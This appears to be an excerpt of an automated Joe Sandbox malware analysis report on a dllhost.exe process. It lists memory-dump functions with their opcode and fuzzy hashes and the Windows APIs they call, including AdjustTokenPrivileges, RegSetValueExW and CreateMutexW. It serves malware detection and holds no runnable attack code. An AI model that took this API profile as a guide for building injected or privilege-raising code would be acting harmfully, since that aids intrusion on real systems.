Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 232c9458a550f68d1b055b18c28469e75060b7be42b6e74e91add6bd76d0fbba
Instruction ID: 4551ea98f62f5f50d47d0669b43843e414fa847e83e1b0811f4ce812d9ec0e34
Opcode Fuzzy Hash: 232c9458a550f68d1b055b18c28469e75060b7be42b6e74e91add6bd76d0fbba
Instruction Fuzzy Hash: BFD05238B08114CBE7A08F18EC183ACB660BB43314F0408A0E80A8A291CBB88E80CFD1

Function 009A6AD0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 219e87a76d8cb8216bf42fd55c4c29f399e7b751c2ffbeaffff42e6555c27d2b
Instruction ID: aaeaa9f4a1056c9aa42f8f300521242016c035bc384ba995e8d89677b7fd91d8
Opcode Fuzzy Hash: 219e87a76d8cb8216bf42fd55c4c29f399e7b751c2ffbeaffff42e6555c27d2b
Instruction Fuzzy Hash: 61D0C93118D3EA0EC30782780C344693F244C0310835A00EF90C4CF5D3D116C4468355

Function 009A6C39 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac7cef8ea3a2ac686100f01b8c6225a7acc384a7593b0fcdc085fe8296f7f64
Instruction ID: fe18968f250058c7ce858f2dede4b9368dbd4beff35b0d78709d0e8e34c9aaba
Opcode Fuzzy Hash: 3ac7cef8ea3a2ac686100f01b8c6225a7acc384a7593b0fcdc085fe8296f7f64
Instruction Fuzzy Hash: BFC04C6599F3E16EDB1392741CF48473F780C4341870A40C7D4C8CF093D748585AC3A6

Function 00B40DF9 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d7607d8e849639689b353a2bb9871b9442a4e1bec5724488e6d9f4dab7d95de
Instruction ID: bf28a7e243d4d43f6e35bd64190ad381b9179968e8a11d26c4296899e2f8c476
Opcode Fuzzy Hash: 4d7607d8e849639689b353a2bb9871b9442a4e1bec5724488e6d9f4dab7d95de
Instruction Fuzzy Hash: 02C04C5369E3C54EC717027018540946F2448B321534910DBE0898E1F6E56A49155712

Function 009AF250 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 249cf6273dfcadbb9e9299305c55a894a680e5088a45bf9c81745f9c88128686
Instruction ID: 0ca9454c7243953b4e8c8e84208a54a141a570e0e8c9fa4162bfbba784800161
Opcode Fuzzy Hash: 249cf6273dfcadbb9e9299305c55a894a680e5088a45bf9c81745f9c88128686
Instruction Fuzzy Hash: 9BB0123104130949C7301170A401220320C4F4150AE1000F9550C05B02D93AA0404049

Function 00B4057C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da35c5f288ffbed3c4c064ae20213e96b0e2df5d3d75b82b09020a1ab10c47f5
Instruction ID: 7edb7d8ad8239e14b6fe020feef0ab6a6e15f250a4b182cfbaca0c30bdacc28e
Opcode Fuzzy Hash: da35c5f288ffbed3c4c064ae20213e96b0e2df5d3d75b82b09020a1ab10c47f5
Instruction Fuzzy Hash: 28C04C70E05204CBEF54ABB0955839C7AE1AB85340FA0441DA106AB385DE784A449B91

Function 00B4098D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ed3e61c7974ea8438a771618315b5ba88df73f211008f5ae15bf02aa2c9207d
Instruction ID: 642e1f541bbc31ed50213cfab6081a43fa78c0fee627e01ed3273917da364cd4
Opcode Fuzzy Hash: 0ed3e61c7974ea8438a771618315b5ba88df73f211008f5ae15bf02aa2c9207d
Instruction Fuzzy Hash: 61C04870E06204CBEF44ABA0D56C3AC7AE1AB85340FA04429A10AAB385DA784A44DB81

Function 009A69A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction ID: ce9f0d320568e7aeddd1da0d443e20918fc001d358bb9c195afdc7c1ad0b123c
Opcode Fuzzy Hash: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction Fuzzy Hash: 32A011300002088BC200ABA8E008EA033ECAB08A08F0000F0A20C8BA228A22B8008A82

Function 009AA2A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd886e34c4e5383e7ce55f610ad065c70d2274550f1e1671ca6939f492dae120
Instruction ID: 3c332420f19e5f1de606fb36bd62989f8c3bdf11a4a85370c20d1dff02705553
Opcode Fuzzy Hash: cd886e34c4e5383e7ce55f610ad065c70d2274550f1e1671ca6939f492dae120
Instruction Fuzzy Hash: 60A02232200A0C8B8A0033E83C0F30CB30CACC02803800000B00C000030F20B80088E2

Function 009A6AE0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcb1be9f07aa3f3e59929610a817e586aac02bf2d17f6a5c07cb906b60918d57
Instruction ID: 7a37bd59c523511826c5d1c55078843e9b1dcd39b295030e9dd2ce83600917bf
Opcode Fuzzy Hash: fcb1be9f07aa3f3e59929610a817e586aac02bf2d17f6a5c07cb906b60918d57
Instruction Fuzzy Hash: D4A02232082B0C83C20022B02000030B38C8A0200C3E200B8830C08F202AB3F0A0808C

Function 009AF758 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e34d6af57945df41cc88a17653771f5ffb83b3e6d45e0b6fd44e15f8cc12b0a
Instruction ID: 9f298da58c252dbc3072962d7ff01bcfe03185eda77c8a410282eaeed15df0b9
Opcode Fuzzy Hash: 8e34d6af57945df41cc88a17653771f5ffb83b3e6d45e0b6fd44e15f8cc12b0a
Instruction Fuzzy Hash: 02A0021168C30C22D44022D67802B55765C4B92A69E814061E60D0AE911982745410EE

Function 009AE018 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 756e128f5d4aa4776dac7c9485f13d05d40772d76c996619f6271ac30e05eabb
Instruction ID: 297c73b3b3554fc626729d69b36838d6cc028db6e41d5114d82462f5fce55f07
Opcode Fuzzy Hash: 756e128f5d4aa4776dac7c9485f13d05d40772d76c996619f6271ac30e05eabb
Instruction Fuzzy Hash: AD90047114470CCF454037D57D0D555F75CF5C45177C00451F50D415115FF5755047D5

Function 009A6C48 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a29d0e3402c6c9773f2ca5c6a761c85c498fdbbed2d42cc8d1dff145c7332d22
Instruction ID: e57354dde3fec212bf98a2b796b090a8f4e4701070449799e9b6f890f06359f7
Opcode Fuzzy Hash: a29d0e3402c6c9773f2ca5c6a761c85c498fdbbed2d42cc8d1dff145c7332d22
Instruction Fuzzy Hash:

Function 009AF840 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 962b695e29225f5734c442db238b77566dea6e77d8c31a500118ad212773d258
Instruction ID: 2750d2a667c22864fcb631b9a9c2016866c9b6878674cfcb6a828f52c178f59a
Opcode Fuzzy Hash: 962b695e29225f5734c442db238b77566dea6e77d8c31a500118ad212773d258
Instruction Fuzzy Hash:

Function 009AF6D8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74d4b150b5b10db6c6f283049cf8ea6abf6c157d48a7e7631fe463985207537a
Instruction ID: 59550be9a9f2389136b791784b27d15fa304775db72fca1d2949a4ddc35cad81
Opcode Fuzzy Hash: 74d4b150b5b10db6c6f283049cf8ea6abf6c157d48a7e7631fe463985207537a
Instruction Fuzzy Hash:

Function 009AEEE0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8601673fee4419c493e26bf8c864a67b65e7a5c27fe196e90f82e4a897199e5c
Instruction ID: 1db3f34abd33a675edaa9bd9efba958f26389778bd0cb1762bfd6377c865ba5f
Opcode Fuzzy Hash: 8601673fee4419c493e26bf8c864a67b65e7a5c27fe196e90f82e4a897199e5c
Instruction Fuzzy Hash: 5A90023144470DCB45442B957809595775CE584D267810451B51D417115E66646045D9

Function 009ADE00 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 715a8574b6f46959feb7c75132908d2eea41683b02611ee8c07e59c3cc2fc1fe
Instruction ID: 8c390dc6b98453691e9f8855b17821ced40e9f7ac36ecedf00fded59ea8dc848
Opcode Fuzzy Hash: 715a8574b6f46959feb7c75132908d2eea41683b02611ee8c07e59c3cc2fc1fe
Instruction Fuzzy Hash: 4490023104460D9B464127957809555B75CA5949157808451A50D415125A65E9154599

Function 009AF278 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f69446dd173fc70ea47b7622fbe23618cbefeea4d5156b8c36e0e9d41e47790
Instruction ID: 882d3ec37570db38cdc72c68e8250bf2b51a68caf8c031a475e7bb08ebe0120f
Opcode Fuzzy Hash: 0f69446dd173fc70ea47b7622fbe23618cbefeea4d5156b8c36e0e9d41e47790
Instruction Fuzzy Hash: 8A90023144870ECB458427957909555775CA5845157800455B50D419125E556510459D

Function 009AF718 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6a59e02be612daf628d2c2f901aaac9fa22ee472457c03cbd6214ac2039d3e1
Instruction ID: 78a24ee54de588c6940f29d22e79c22282a74f0632238a95fa07df8fed51df7f
Opcode Fuzzy Hash: e6a59e02be612daf628d2c2f901aaac9fa22ee472457c03cbd6214ac2039d3e1
Instruction Fuzzy Hash:

Function 00B40E08 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9607aa7a75c076cb9b1b1d7a60fe3a2bc6f02f3f7b6fd118abbc194b73d430e5
Instruction ID: 561036fe7af1ca5b89911b14e33b34be8dcf07ffa9ca6489a158acbc6734831c
Opcode Fuzzy Hash: 9607aa7a75c076cb9b1b1d7a60fe3a2bc6f02f3f7b6fd118abbc194b73d430e5
Instruction Fuzzy Hash:

Analysis Process: dllhost.exePID: 5480, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	66
Total number of Limit Nodes:	6

Executed Functions

Function 0086B32F Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0086B3AF

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 69fac074d9a5307db55c887368126021fe27927d7d6249c1d663c71eff81f8ed
Instruction ID: f93a022834902e11c0890db32b30ce450d539cfc763a5882f1e7bcaff793aaad
Opcode Fuzzy Hash: 69fac074d9a5307db55c887368126021fe27927d7d6249c1d663c71eff81f8ed
Instruction Fuzzy Hash: 3B21D1755097809FDB228F25DC40B92BFF4EF06310F0984DAE985CB263D331A908CB62

Function 0086B4B1 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0086B51D

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: cf57091f45f603cc50e3e4d77ba58530e1cade5da3c4b15ac84d9c8b743ace72
Instruction ID: 67c42c5dd3af3b2818009521deb408863c2deabb881902e7466459e64143f173
Opcode Fuzzy Hash: cf57091f45f603cc50e3e4d77ba58530e1cade5da3c4b15ac84d9c8b743ace72
Instruction Fuzzy Hash: 991190724093C09FDB228F15DC45A92FFB4FF16324F0980DAE9858B163D265A918CB62

Function 0086B366 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0086B3AF

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 3862b95aa1a0af2a5e3120d80df37ba500f4406481468b08d632f0f42411944f
Instruction ID: ec9394d0c11a679f88bb94943c8cbb2ce10478d14381c2a3a93b5f59e9765260
Opcode Fuzzy Hash: 3862b95aa1a0af2a5e3120d80df37ba500f4406481468b08d632f0f42411944f
Instruction Fuzzy Hash: 1C119E756046049FEB20CF55D984B96FBE4FF08324F0888AAED45CB752D332E854DB61

Function 0086B4E2 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0086B51D

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 1ef4825661ab30ddc1fa8c3ccd5c18c60dac495bbcfa2e5019095cb03ee19c56
Instruction ID: eb65037a6951697c609b06e1244df7d5de2b1446f8354ef48770bc32b48f6abe
Opcode Fuzzy Hash: 1ef4825661ab30ddc1fa8c3ccd5c18c60dac495bbcfa2e5019095cb03ee19c56
Instruction Fuzzy Hash: 230184754042449FDB218F15D945BA1FBE0FF08324F08C49ADE468B652C375A458DF62

Function 04840080 Relevance: 2.6, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04840100
dS|l, xrefs: 048401B9

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: 2d5f184052a61c1f86b07b42d05eb2ef57393136b87543560706dabe82c294bf
Instruction ID: a2c1dd675a94a95d5052c091e5b7dd2407b7ea8be19a81aae925c7bd8eef566b
Opcode Fuzzy Hash: 2d5f184052a61c1f86b07b42d05eb2ef57393136b87543560706dabe82c294bf
Instruction Fuzzy Hash: 5D319F34904A81CFD308EB7EEA52259BBE2BF85708F55C17DC5048B368EF7166158B82

Function 04840090 Relevance: 2.6, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04840100
dS|l, xrefs: 048401B9

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: ea9ab0fc0ac622f953d63967bb349755b462743821d51f579191d3dc6c7bf2a7
Instruction ID: 86b03a18aa2a3653f3362113e87ccf3efbbc69894fcea251c73c2be538b3994f
Opcode Fuzzy Hash: ea9ab0fc0ac622f953d63967bb349755b462743821d51f579191d3dc6c7bf2a7
Instruction Fuzzy Hash: EE216D34904A41CBD308EB7EEA56259FBE2FF85708F55C17DC5088B26CEF716A158B82

Function 04BC0A46 Relevance: 2.5, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5, xrefs: 04BC0A6C
E, xrefs: 04BC0A49

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: 5$E
API String ID: 0-717204176
Opcode ID: a3d0ff915d7ec554ea63d81deb8f7f012a7d1dbd6093b6b3866b6236820e8d74
Instruction ID: 77042c92906eb22010ba01ced41cb7f8f03069ef56a9b47b42aeddee5498fa18
Opcode Fuzzy Hash: a3d0ff915d7ec554ea63d81deb8f7f012a7d1dbd6093b6b3866b6236820e8d74
Instruction Fuzzy Hash: 32D05E7080624BCFCB419F60985959C7BB4FF51315B44434D80019E28ADA3D4525DB01

Function 04BC0140 Relevance: 2.5, Strings: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/, xrefs: 04BC065E
B, xrefs: 04BC0144

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: /$B
API String ID: 0-2775194069
Opcode ID: 30d0f13a61ee81ecacf5c6457332752cfb7ffd9e6988ed014ad7a73b7c482cc7
Instruction ID: 70bb2aad86dbdbfa0e8acb60a5e7fe2fa8e81a1048bc004d22e4657fa1c56279
Opcode Fuzzy Hash: 30d0f13a61ee81ecacf5c6457332752cfb7ffd9e6988ed014ad7a73b7c482cc7
Instruction Fuzzy Hash: 60D05B64906245DBDB01AFE485583687FB5AF51200F4445E9D14AAF2C7E93C54009716

Function 0086A793 Relevance: 1.6, APIs: 1, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0086A849

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f5342e129bdabdd0ca81270ae9f1b5500e84ae503df947b79aa136ee93cdf05f
Instruction ID: 6fa5f3adff54fd15fa6d747a06fcb80408d8a6d9fbf858abf3ccf1c83d5ff7df
Opcode Fuzzy Hash: f5342e129bdabdd0ca81270ae9f1b5500e84ae503df947b79aa136ee93cdf05f
Instruction Fuzzy Hash: 6D31A1B5505380AFE722CB25CC45B62BFF8EF06314F09849AE9859B152D375A909CB62

Function 0086B62E Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0086B6D5

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 267985e9491ca380ea10ddeb866611de9d6e6958e3c49183514355ec746d7595
Instruction ID: 3bf9f78ceebd295015797eb14d9c1878970f80ce2aec455ccf6946150da3e64f
Opcode Fuzzy Hash: 267985e9491ca380ea10ddeb866611de9d6e6958e3c49183514355ec746d7595
Instruction Fuzzy Hash: F731B1B55093806FE711CB65CC85BA6FFF8EF06314F09849AE944CB292D375A908C762

Function 0086A120 Relevance: 1.6, APIs: 1, Instructions: 86
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0086A1C2

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 45df063f328b39a0d3e8cef17dca1e021c6a513a22ed47b821e63d1b89c42355
Instruction ID: f724f7dc018342605911426e9b6b517a325dd4de66c683822dd9fbf36fb23950
Opcode Fuzzy Hash: 45df063f328b39a0d3e8cef17dca1e021c6a513a22ed47b821e63d1b89c42355
Instruction Fuzzy Hash: 0B31827140D3C06FD3128B258C51BA6BFB4EF47620F0A45DBD984DF5A3D229691AC7A2

Function 0086AF4A Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,B347177C,00000000,00000000,00000000,00000000), ref: 0086AFF0

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: d596a2824e4d6ddcf5ac1d48bf2a8b8069c0321984ada7f58f8663a9dc0bc9c5
Instruction ID: c964d243accd09f6c7fa58e87a1dbbfb2c79b0fea06b507a477e9517a12b780a
Opcode Fuzzy Hash: d596a2824e4d6ddcf5ac1d48bf2a8b8069c0321984ada7f58f8663a9dc0bc9c5
Instruction Fuzzy Hash: 11217FB65087409FD722CB51CC44BA6BBB8EF06210F09849AE985DB192D724E948CB62

Function 0086A8A0 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E24,B347177C,00000000,00000000,00000000,00000000), ref: 0086A935

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 7ebc7efa30c7de1075ebe9282f7a596dbf73ad969e867f879f6507dcb35f2f59
Instruction ID: 4c9a2edb227006a75bb63fafe55f40f98ee3bce78c28434a5c7395b14b826932
Opcode Fuzzy Hash: 7ebc7efa30c7de1075ebe9282f7a596dbf73ad969e867f879f6507dcb35f2f59
Instruction Fuzzy Hash: 46210D754097805FE7128B21DC45BB6BFBCEF47720F0980DAE9849B193D2645D09C772

Function 0086B046 Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,B347177C,00000000,00000000,00000000,00000000), ref: 0086B0DC

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d5b980bc2c953e7b76953d8a12644f50d4317d5a3f30161625e2d783b18c48c2
Instruction ID: 8dfb9d49889f7fcb491480877723c013e78d81b1f7f82822d9fa9b89396a1ead
Opcode Fuzzy Hash: d5b980bc2c953e7b76953d8a12644f50d4317d5a3f30161625e2d783b18c48c2
Instruction Fuzzy Hash: F62192765087806FE7228B11CC45F67BFB8EF46314F09849AE985DB152D364E948CB72

Function 0086A7CA Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0086A849

Memory Dump Source

Source File: 00000029.00000002.2772192563.000000000086A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_86a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b55aa6e37930de936468ea92230694e2aa889f15d28ae7cdbcc7a8aa46a2f5e3
Instruction ID: 4c3b8963c26abcb23a7759f551c9c27d9bd87b2b82d2bee5a0047e0e0ae135f8
Opcode Fuzzy Hash: b55aa6e37930de936468ea92230694e2aa889f15d28ae7cdbcc7a8aa46a2f5e3
Instruction Fuzzy Hash: 9E21A175504204AFEB21CF65CD45F66FBE8FF08324F04886AEA45DB251D371E905CBA2

Function 0086AD1A Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule
